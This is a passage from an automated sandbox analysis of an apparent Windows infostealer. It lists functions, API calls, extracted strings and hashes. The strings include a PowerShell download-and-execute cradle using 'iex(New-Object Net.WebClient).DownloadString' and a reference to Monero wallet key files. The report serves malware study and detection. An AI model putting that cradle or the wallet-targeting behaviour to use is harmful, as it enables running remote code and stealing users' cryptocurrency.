                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D2D85
                        Strings
                        • <, xrefs: 005D2D39
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 005D2CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 005D2D04
                        • ')", xrefs: 005D2CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 112db245b9167f0633ac3f43828999e1e5facd6adb10e58550445c8305c0f600
                        • Instruction ID: 9fe7cf71c9feac1f493188b680043343cfc24a4883f66e9c14fc89ee71db58ea
                        • Opcode Fuzzy Hash: 112db245b9167f0633ac3f43828999e1e5facd6adb10e58550445c8305c0f600
                        • Instruction Fuzzy Hash: CE41D271C102499ADB28FBA4C895BEEBF78BF50300F40411BE446A6291DF746A8ADF95
                        Function 005C9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005C9F41
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: e9576280ecb9f1dc7a4817be847349d1b54d91146b503a96770557a73b215531
                        • Instruction ID: 5cd5461e4e8fcf16c6e1883abd78ac8673a15fa9e5df56d3151867e6f41ad95a
                        • Opcode Fuzzy Hash: e9576280ecb9f1dc7a4817be847349d1b54d91146b503a96770557a73b215531
                        • Instruction Fuzzy Hash: B1614270A1024D9FDB24EFA4CC9AFEE7B75BF84344F008419F90A5B291DB746A45CB91
                        Function 005D40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,014AF7A8,00000000,00020119,?), ref: 005D40F4
                        • RegQueryValueExA.ADVAPI32(?,014B0480,00000000,00000000,00000000,000000FF), ref: 005D4118
                        • RegCloseKey.ADVAPI32(?), ref: 005D4122
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4147
                        • lstrcat.KERNEL32(?,014B04B0), ref: 005D415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 2afb2dc3392f16256672f59ee0175848aeb1b4a9a5cf21611ff8bee4c4af4e72
                        • Instruction ID: b13dfa1abf7d2cedb2dfab806ed5f39ddde3dc7a9b1cd9199f70490b8c092239
                        • Opcode Fuzzy Hash: 2afb2dc3392f16256672f59ee0175848aeb1b4a9a5cf21611ff8bee4c4af4e72
                        • Instruction Fuzzy Hash: DC415BB6D002086BDB28EBE0DC5AFFE777DB788300F40455DB61656181EA759B888FD2
                        Function 005D7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B9C8,00000000,00020119,?), ref: 005D7E5E
                        • RegQueryValueExA.ADVAPI32(?,014AF728,00000000,00000000,000000FF,000000FF), ref: 005D7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 005D7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: b30cf69a5a630b46df9e2a3276af5a0a4da7ee00054be5f6b5634edb2900102c
                        • Instruction ID: 436a090c028b8b19b937b6d418e1e72434ef73d788d0c5c074d41d88376ac0aa
                        • Opcode Fuzzy Hash: b30cf69a5a630b46df9e2a3276af5a0a4da7ee00054be5f6b5634edb2900102c
                        • Instruction Fuzzy Hash: 031151B1A44309EBD718CF98DD49F7BBBBCFB48711F10815AF605A7280D77458008BA2
                        Function 005D9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(014B01B0,?,?,?,005D140C,?,014B01B0,00000000), ref: 005D926C
                        • lstrcpyn.KERNEL32(0080AB88,014B01B0,014B01B0,?,005D140C,?,014B01B0), ref: 005D9290
                        • lstrlen.KERNEL32(?,?,005D140C,?,014B01B0), ref: 005D92A7
                        • wsprintfA.USER32 ref: 005D92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 4965bdd97b2b944a08653b76b5e82f2166eeb650c4085757e882dbe225f09827
                        • Instruction ID: dd2e4b8950982f64e47fe174cc0cb043f1b175dbd02614912b69147251360279
                        • Opcode Fuzzy Hash: 4965bdd97b2b944a08653b76b5e82f2166eeb650c4085757e882dbe225f09827
                        • Instruction Fuzzy Hash: 42019375500208FFCB48DFECC998EAE7BB9FF48364F148548F9099B245C671AA40DB92
                        Function 005C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005C12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005C12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005C12F5
                        • RegCloseKey.ADVAPI32(?), ref: 005C12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 79bcacca3e51c10bf4c45d03710488999256c66979ee25e5f7978a0a0c377d00
                        • Instruction ID: 55e46bcd4a91d7d53ee4978c1c7e7466391920c6cd10f74d337f8f0f3c9483d3
                        • Opcode Fuzzy Hash: 79bcacca3e51c10bf4c45d03710488999256c66979ee25e5f7978a0a0c377d00
                        • Instruction Fuzzy Hash: 8D01E1B9A40308BFDB44DFE4DC59FAEB7B8FB48701F108159FA0597280D6759A018F51
                        Function 005DC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 66463c4071749583436f1624d52c50e6144a82a268ab1829b8137e9e1dd583a8
                        • Instruction ID: 24fedc2be92b15d3965a72d9ef0e090fc084b20f7ccefb6d0df009a3eda0b360
                        • Opcode Fuzzy Hash: 66463c4071749583436f1624d52c50e6144a82a268ab1829b8137e9e1dd583a8
                        • Instruction Fuzzy Hash: 2641087150075D5EDB318B288D94FFB7FF8BB45704F1444EBE98A86282D271AA44DF60
                        Function 005D6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 005D6663
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D6726
                        • ExitProcess.KERNEL32 ref: 005D6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 01b6ccdfd04ac4a2f251fee4f2195cda0091000ee339a9e14bb15dfa2c97642c
                        • Instruction ID: 2a8bae0ba1b9087861ca2903c16e47724f1448824f36f4f2be23d2db58194fb3
                        • Opcode Fuzzy Hash: 01b6ccdfd04ac4a2f251fee4f2195cda0091000ee339a9e14bb15dfa2c97642c
                        • Instruction Fuzzy Hash: 273152B1C012189BDB64EB94DC95FDE7B78BF44300F40419AF21966291DF746B48CF5A
                        Function 005D87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,005E0E28,00000000,?), ref: 005D882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8836
                        • wsprintfA.USER32 ref: 005D8850
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: c2213505fb22fc4e736e8338ac8f1e02ac50f6d76c7842c2e9bfb63b8eb24066
                        • Instruction ID: df8ba11e05c9214bd9024fedcef41c1185c420715fece86bde1335fa5a71f6ad
                        • Opcode Fuzzy Hash: c2213505fb22fc4e736e8338ac8f1e02ac50f6d76c7842c2e9bfb63b8eb24066
                        • Instruction Fuzzy Hash: 6B2112B1A40308AFDB58DF98DD49FAEBBB8FB48711F104519F605A7380C7799901CBA1
                        Function 005D8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005D951E,00000000), ref: 005D8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8D62
                        • wsprintfW.USER32 ref: 005D8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 6951656a0c47666c6e93c4af922b9e3d8c4d4d701b43d1148c909650b615c328
                        • Instruction ID: e413b1988b3cac9bf790f3b3a223d0ad18892b36f7b5f89c0dd9688680a9b32e
                        • Opcode Fuzzy Hash: 6951656a0c47666c6e93c4af922b9e3d8c4d4d701b43d1148c909650b615c328
                        • Instruction Fuzzy Hash: E3E0ECB5A44308BBD758DBA4DD0AE697BB8FB44702F0081A8FD4997280DA719E109B96
                        Function 005CA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 005CA3FF
                        • lstrlen.KERNEL32(00000000), ref: 005CA6BC
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 005CA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
